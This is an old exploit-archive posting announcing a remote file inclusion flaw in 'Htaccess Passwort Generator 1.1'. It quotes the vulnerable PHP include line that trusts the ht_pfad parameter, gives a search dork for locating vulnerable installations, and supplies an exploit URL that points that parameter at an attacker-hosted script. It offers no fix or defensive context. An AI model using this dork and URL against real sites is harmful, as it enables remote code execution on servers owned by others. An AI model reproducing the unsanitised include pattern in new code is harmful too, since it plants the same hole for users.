Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability
# Published : 2007-02-16
# Author : kezzap66345
# Previous Title : VS-Link-Partner <= 2.1 (script_pfad) Remote File Include Exploit
# Next Title : webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit

********Htaccess_gen_V[1].1.1_(C)**********
Htaccess Passwort Generator V.1.1
Discovered By:- kezzap66345
Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHP_Scripte&seite=2
dork:ht_gen.php

code:

include ($ht_pfad."/tpl/ok.html");

exploit
http://target/[path]/generate.php?ht_pfad=3vil script?
I am a Turk..

# www.Syue.com [2007-02-16]